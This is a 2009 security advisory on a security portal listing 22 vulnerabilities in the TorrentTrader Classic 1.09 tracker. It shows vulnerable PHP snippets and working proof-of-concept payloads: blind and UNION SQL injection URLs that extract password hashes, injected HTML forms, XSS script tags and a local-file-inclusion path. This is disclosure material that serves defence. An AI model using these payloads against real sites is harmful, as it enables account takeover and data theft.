Waraxe IT Security Portal
Login or Register
October 6, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 115
Members: 0
Total: 115
Full disclosure
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
SEC Consult SA-20240925-0 :: Uninstall Password Bypass in BlackBerry CylanceOPTICS Windows Installer Package (CVE-2024-35214)
Apple iOS 17.2.1 - Screen Time Passcode Retrieval (MitigationBypass)
CyberDanube Security Research 20240919-0 | Multiple Vulnerabilities in Netman204
Submit Exploit CVE-2024-42831
Stored XSS in "Edit Profile" - htmlyv2.9.9
Stored XSS in "Menu Editor" - htmlyv2.9.9
Backdoor.Win32.BlackAngel .13 / Unauthenticated Remote CommandExecution
[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09





Author: Janek Vind "waraxe"
Date: 15. June 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-74.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature packed and highly customisable PHP/MySQL Based
BitTorrent tracker. Featuring integrated forums and plenty of administration
options. Please visit www.torrenttrader.org for the support forums.

http://sourceforge.net/projects/torrenttrader


List of found vulnerabilities
===============================================================================

1. Sql Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "origmsg" is used in sql query
Preconditions:
1. attacker must be logged in as valid user

Test:

http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes

Result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
if ($msg) {
$msg = trim($msg);

$res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver)."");
$user = mysql_fetch_assoc($res);
if (!$user)
$message = "Username not found.";
...

if ($origmsg && $delete == "yes")
mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr();
-----------------------------[source code end]---------------------------------


2. Weak password generation algorithm in "account-recover.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. generated password is weak and can be easily bruteforced
Preconditions:
1. attacker must know email address associated with target's account

Torrenttrader contains password reseting functionality:

http://localhost/torrenttrader109/account-recover.php

Anyone can initiate password reset, only condition is, that target's email
address must be know. Torrenttrader will check email address and after successful
validation new, temporal password will be generated and sent to that email address.
Specific autogenerated password appears to be random number between 10000 and 50000,
so basically there can be only 40000 possible temporal passwords. It's easy to
write bruteforce script, which will try all possible password combinations.
This process can take couple of hours or more, but eventually the password will
be guessed and target account becomes compromised.

-----------------------------[source code start]-------------------------------
if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") {
$email = trim($_POST["email"]);
if (!validemail($email)) {
$msg = "" . NOT_VAILD_EMAIL . "";
$kind = "Error";
}
else {
$res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1");
$arr = mysql_fetch_assoc($res);

if (!$arr) {
$msg = "" . EMAIL_INVALID . "";
$kind = "Error";
}
...
if ($arr) {
$newpassword = rand(10000, 50000);
$md5pass = md5($newpassword);
-----------------------------[source code end]---------------------------------


3. Unauthorized database backup vulnerability in "backup-database.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. missing access control
Preconditions:
1. mysqldump utility must be available
2. gzip utility must be available
3. target directory must be writable
4. database name must be known in order to successfully guess archive filename

Test:

http://localhost/torrenttrader109/backup-database.php

Resulting message: "Database backup successful, entry inserted into database."

-----------------------------[source code start]-------------------------------
system(sprintf(
'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz',
$host,
$user,
$pass,
$db,
getenv('DOCUMENT_ROOT'),
$backupdir,
$db,
$day,
$month,
$year
));
-----------------------------[source code end]---------------------------------

Attacker is able to create database backup and resulting "gz" archive's
filename can be guessed, if attacker knows database name. This file is also
directly downloadable from website. Example download URI:

http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz

As result information leakage exists. For example, attacker can fetch admin
credentials from backed up database.


4. Sql Injection vulnerability in "browse.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "wherecatin" is used in sql query
Preconditions:
1. none

Test:

http://localhost/torrenttrader109/browse.php?wherecatin=waraxe

Result:

Unknown column 'waraxe' in 'where clause'

-----------------------------[source code start]-------------------------------
if (count($wherecatina) > 1)
$wherecatin = implode(",",$wherecatina);
elseif (count($wherecatina) == 1)
$wherea[] = "category = $wherecatina[0]";
...
if ($wherecatin)
$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")";

if ($where != "")
$where = "WHERE $where";

$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
-----------------------------[source code end]---------------------------------

This specific sql injection vulneraility can be exploited using blind attack
methods. If there is one or more active torrents in database, then usable is
attack pattern below:

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1

and we see found torrents.

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1

"No torrents were found based on your search criteria."

In this way attacker is able to ask boolean questions from database and retrieve
needed information bit by bit - example of classical blind sql injection.

If there is no active torrents in database, then induced sql errors method can be used.

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

"Subquery returns more than 1 row"

http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

"No torrents were found based on your search criteria."


5. Information leakage in "check.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. missing access control
Preconditions:
1. none

Test:

http://localhost/torrenttrader109/check.php

This script is originally meant to be used by installer and lately by admins.
Because of lacking access control attacker is able to use it for gathering some
useful information about target system - full path to webroot, file and directory
permissions of specific files, couple of php settings.

6. Sql Injection vulnerability in "delreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "categ" is used in sql query
Preconditions:
1. attacker must have at least super moderator privileges (user class > 3)
Comments:
1. very easy to exploit

Test:

http://localhost/torrenttrader109/delreq.php?categ=waraxe

Result:

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near
'waraxe order by requests.request LIMIT 0,50' at line 1

Test 2:

http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+

and we can see all usernames, password hashes and emails from database.


7. Sql Injection vulnerability in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "choice" is used in sql query
Preconditions:
1. attacker must be logged in as valid user
2. there must exist at least one poll

Testing needs custom written html form:
-------------------------------------------------------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/index.php" method="post">
<input type="hidden" name="choice" value="waraxe">
<input type="submit" value="Test!">
</form></center></body></html>
-------------------------------------------------------------------------------

Result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
if ($_SERVER["REQUEST_METHOD"] == "POST")
{
$choice = $_POST["choice"];
if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice))
{
$res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr();
$arr = mysql_fetch_assoc($res) or die("No poll");
$pollid = $arr["id"];
$userid = $CURUSER["id"];
$res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr();
$arr = mysql_fetch_assoc($res);
if ($arr) die("Dupe vote");
mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr();
-----------------------------[source code end]---------------------------------


8. Sql Injection vulnerability in "modrules.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "id" is used in sql query
Preconditions:
1. attacker must have at least moderator privileges

Testing needs custom written html form:
-------------------------------------------------------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/modrules.php?act=edited" method="post">
<input type="hidden" name="title" value="test">
<input type="hidden" name="text" value="test">
<input type="hidden" name="public" value="yes">
<input type="hidden" name="class" value="0">
<input type="hidden" name="id" value="1">
<input type="submit" value="Test!">
</form></center></body></html>
-------------------------------------------------------------------------------

Test result: "MYSQL Error has occurred!"

-----------------------------[source code start]-------------------------------
elseif ($_GET["act"]=="edited"){
$id = $_POST["id"];
$title = sqlesc($_POST["title"]);
$text = sqlesc($_POST["text"]);
$public = sqlesc($_POST["public"]);
$class = sqlesc($_POST["class"]);
mysql_query("update rules set title=$title, text=$text, public=$public,
class=$class where id=$id") or sqlerr(__FILE__,__LINE__);
-----------------------------[source code end]---------------------------------


9. Information leakage in "phpinfo.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. missing access control
Preconditions:
1. none

Test:

http://localhost/torrenttrader109/phpinfo.php

-----------------------------[source code start]-------------------------------
<?php
phpinfo();
?>
-----------------------------[source code end]---------------------------------

This script can be used by attacker to obtain information from php function
phpinfo(). Access to such script must be limited to admins, but currently there
is not any access control at all.


10. Sql Injection vulnerabilities in "report.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "user" is used in sql query
2. unsanitized user submitted parameter "torrent" is used in sql query
3. unsanitized user submitted parameter "forumid" is used in sql query
4. unsanitized user submitted parameter "forumpost" is used in sql query
Preconditions:
1. attacker must be logged in as valid user

Two proof-of-concept tests below are using parameter "user".

Test 1 needs custom written html form:
-------------------------------------------------------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/report.php" method="post">
<input type="hidden" name="reason" value="test">
<input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),1)-- ">
<input type="submit" value="Test!">
</form></center></body></html>
-------------------------------------------------------------------------------

Test result: "MYSQL Error has occurred!"

Test 2 needs custom written html form:
-----------------------------[source code start]-------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/report.php" method="post">
<input type="hidden" name="reason" value="test">
<input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),1)-- ">
<input type="submit" value="Test!">
</form></center></body></html>
-----------------------------[source code end]---------------------------------

Test result: "You have already reported user ..."

It's classical blind sql injection exploitation method and allows attacker to
fetch information from database bit by bit by asking boolean questions.

Other three sql injection vulnerabilities in "report.php" involve user submitted
parameters "torrent", "forumid" and "forumpost" and exploitation can be done in
similar way as seen above.


11. Sql Injection vulnerability in "take-deletepm.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "delmp" is used in sql query
Preconditions:
1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------
if(isset($_POST["delmp"])) {
$do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")";
$res=mysql_query($do)
-----------------------------[source code end]---------------------------------


12. Sql Injection vulnerability in "takedelreport.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "delreport" is used in sql query
Preconditions:
1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();

$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0
AND id IN (" . implode(", ", $_POST[delreport]) . ")");
-----------------------------[source code end]---------------------------------


13. Sql Injection vulnerability in "takedelreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "delreq" is used in sql query
Preconditions:
1. attacker must be logged in as valid user

-----------------------------[source code start]-------------------------------
if (get_user_class() > UC_JMODERATOR){
...
$do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")";
$do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")";
$res2=mysql_query($do2);
$res=mysql_query($do);
...
} else {
foreach ($_POST[delreq] as $del_req){
$delete_ok = checkRequestOwnership($CURUSER[id],$del_req);
if ($delete_ok){
$do="DELETE FROM requests WHERE id IN ($del_req)";
$do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)";
...
function checkRequestOwnership ($user, $delete_req){
$query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr();
-----------------------------[source code end]---------------------------------



14. Sql Injection vulnerability in "takestaffmess.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "clases" is used in sql query
Preconditions:
1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------
adminonly();
...
$updateset = $_POST['clases'];

$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");
-----------------------------[source code end]---------------------------------


15. Sql Injection vulnerability in "takewarndisable.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameter "warndisable" is used in sql query
Preconditions:
1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();
...
if ($disable != '') {
$do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
$res=mysql_query($do);
}

if ($enable != '') {
$do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")";
$res = mysql_query($do);
}
-----------------------------[source code end]---------------------------------


16. Sql Injection vulnerability in "today.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "limit" is used in sql query
Preconditions:
1. none
Comments:
1. seems hard to exploit

Test:

http://localhost/torrenttrader109/today.php?limit=waraxe

Result:

"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in C:apache_wwwroot orrenttrader109 oday.php on line 21"


17. Sql Injection vulnerability in "torrents-details.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "where" is used in sql query
Preconditions:
1. none

-----------------------------[source code start]-------------------------------
//speed mod
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
or sqlerr(__FILE__, __LINE__);
-----------------------------[source code end]---------------------------------

Exploitation is possible using blind sql injection methods.

Test 1:

http://localhost/torrenttrader109/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: normal page

Test 2:

http://localhost/torrenttrader109/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: "MYSQL Error has occurred!"


18. Sql Injection vulnerability in "admin-delreq.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. uninitialized variable "categ" is used in sql query
Preconditions:
1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------
jmodonly();
...
$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,
requests.id, requests.userid, requests.request, requests.added, categories.name
as cat FROM requests inner join categories on requests.cat = categories.id
inner join users on requests.userid = users.id
$categ order by requests.request $limit") or print(mysql_error());
-----------------------------[source code end]---------------------------------

Test:

http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe

Result: "You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use
near 'waraxe order by requests.request LIMIT 0,50' at line 1"


19. Persistent XSS in "viewrequests.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user

Steps for testing:

a) attacker submits request:

http://localhost/torrenttrader109/requests.php

In "Title" field let's insert some javascript:

testtitle<script>alert(123);</script>

b) admin will browse requests:

http://localhost/torrenttrader109/viewrequests.php

and previously planted javascript will be executed in admin session context.



20. Persistent XSS in logging funtionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. unsanitized user submitted parameters used in response html generation
Preconditions:
1. attacker must be logged in as valid user

Steps for testing:

a) attacker uploads torrent file:

http://localhost/torrenttrader109/torrents-upload.php

In "Torrent Name" field let's insert some javascript:

testname<script>alert(123);</script>

Upload is successful: "The torrent has been uploaded successfully!"

b) admin will browse logs:

http://localhost/torrenttrader109/admin.php?act=view_log

and previously planted javascript will be executed in admin session context.


21. Local File Inclusion vulnerability in "backend/admin-functions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:
1. URI case-insensitivity on Windows platform
Preconditions:
1. Windows platform
2. register_globals=on
3. magic_quotes_gpc=off

-----------------------------[source code start]-------------------------------
if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die;
require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php");
-----------------------------[source code end]---------------------------------

As we can see from source code snippet above, direct access to script is blocked.
In case of Windows and Apache combination URI handling is case-insensitive.
In other hand "strpos()" function, used for access control, is case-sensitive.
So this script can be directly executed, if we change some characters in script's
filename to uppercase:

http://localhost/torrenttrader109/backend/Admin-functions.php

"Warning: require_once(./themes//block.php) [function.require-once]:
failed to open stream: No such file or directory in
C:apache_wwwroot orrenttrader109ackendadmin-functions.php on line 3"

If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:

http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00


22. Reflected XSS in multiple scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Examples:

http://localhost/torrenttrader109/themes/default/footer.php?ttversion=<script>alert(123);</script>
http://localhost/torrenttrader109/themes/default/header.php?SITENAME="><script>alert(123);</script>
http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]=<script>alert(123);</script>
http://localhost/torrenttrader109/visitorstoday.php?todayactive=<script>alert(123);</script>
http://localhost/torrenttrader109/visitorsnow.php?activepeople=<script>alert(123);</script>
http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=<script>alert(123);</script>&faq_categ[999][flag]=1
http://localhost/torrenttrader109/torrents-details.php?id=1&keepget="><script>alert(123);</script>


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2009-06-15 (40046 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
Cybercrime news
Ransomware Hits Critical Infrastructure Hard, Costs Adding Up
Ransowmare Crew Infects 100+ Orgs Monthly With New MedusaLocker Variant
Evil Corp/REvil Malware Crime Group Outed As Family Affair
More LockBit Hackers Arrested, Unmasked As Servers Siezed
Ransomware Forces Hospital To Turn Away Ambulances
Ransomware Gang Using Stolen MS Entra ID Creds To Bust Into Cloud
RansomHub Genius Tries To Put The Squeeze On Delaware Libraries
US Indicts Two Over Socially Engineered $230M+ Crypto Heist
Life Imitates xkcd Comic As Florida Gang Beats Crypto Password From Retiree
Cyber Crooks Strut Away With Haute Couture Harvey Nichols Data
Marko Polo Hackers Found To Be Running Dozens Of Scams
Hackers Demand $6 Million From Seattle Airport Operators
Recent WhatsUp Gold Vulnerabilities Possibly Exploited In Ransomware Attacks
Cops Across The World Arrest 51 In Orchestrated Takedown Of Ghost Crime Platform
France Uses Tough, Untested Cybercrime Law To Target Durov
Ransomware Group Leaks Data Stolen From Kawasaki Motors
Old WHOIS Domain Could Have Issued Fraudulent TLS/SSL Certs
Hackers Use Cloud Services To Target Financial And Insurance Firms
When You Pay A Ransom And The Decryptor Doesn't Work
Crypto Scams Rake In $5.6B A Year For Lowlifes, FBI Says
Cisco Merch Shoppers Stung In Magecart Attack
Planned Parenthood Confirms Attack Claimed By RansomHub
Russian Doppelganger Campaign Exposed
FBI: North Korea Aggressively Hacking Cryptocurrency Firms
RansomHub Claims 210 Victims In Just 6 Months
Hacker news
LLM Hijacking Of Cloud Infrastructure Uncovered By Researchers
Thousands Of Linux Systems Infected By Malware Since 2021
DOJ, Microsoft Take Down 107 Russian-Backed Star Blizzards Domains
Ransowmare Crew Infects 100+ Orgs Monthly With New MedusaLocker Variant
Ivanti EPM Vulnerability Exploited In The Wild
Zero-Day Breach At Rackspace Sparks Vendor Blame Game
More LockBit Hackers Arrested, Unmasked As Servers Siezed
T-Mobile Pays $16 Million Fine For Three Years' Worth Of Data Breaches
Rackspace Internal Monitoring Web Servers Hit By Zero Day
WMDDH Discloses Data Breach Impacting 127,000
Cloud Threats Have Execs The Most Freaked Out Because They're Not Prepared
Five Eyes Agencies Release Guidance On Detecting Active Directory Intrusions
Ransomware Gang Using Stolen MS Entra ID Creds To Bust Into Cloud
Millions Of Kia Cars Were Vulnerable To Remote Hacking
Cyberattack Investigated At UK's Busiest Train Stations
China's Salt Typhoon Cyber Spies Are Deep Inside US ISPs
Deloitte Says No Threat To Sensitive Data After Hacker Claims Breach
RansomHub Genius Tries To Put The Squeeze On Delaware Libraries
Ivanti Warns Of Second CSA Vuln Exploited In Attacks
Cyberattack On Kansas Water Treatment Facility Investigated By Feds
Move Over, Cobalt Strike. Splinter's The New Post Exploit Menace In Town
US Indicts Two Over Socially Engineered $230M+ Crypto Heist
China Urges Vigilance Against Taiwanese Cyberattacks
Secret Calculator Hack Brings ChatGPT To The TI-84, Enabling Easy Cheating
Exploiting Exploiting Exchange PowerShell After ProxyNotShell: Part 3 – DLL Loading Chain for RCE
Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.043 Seconds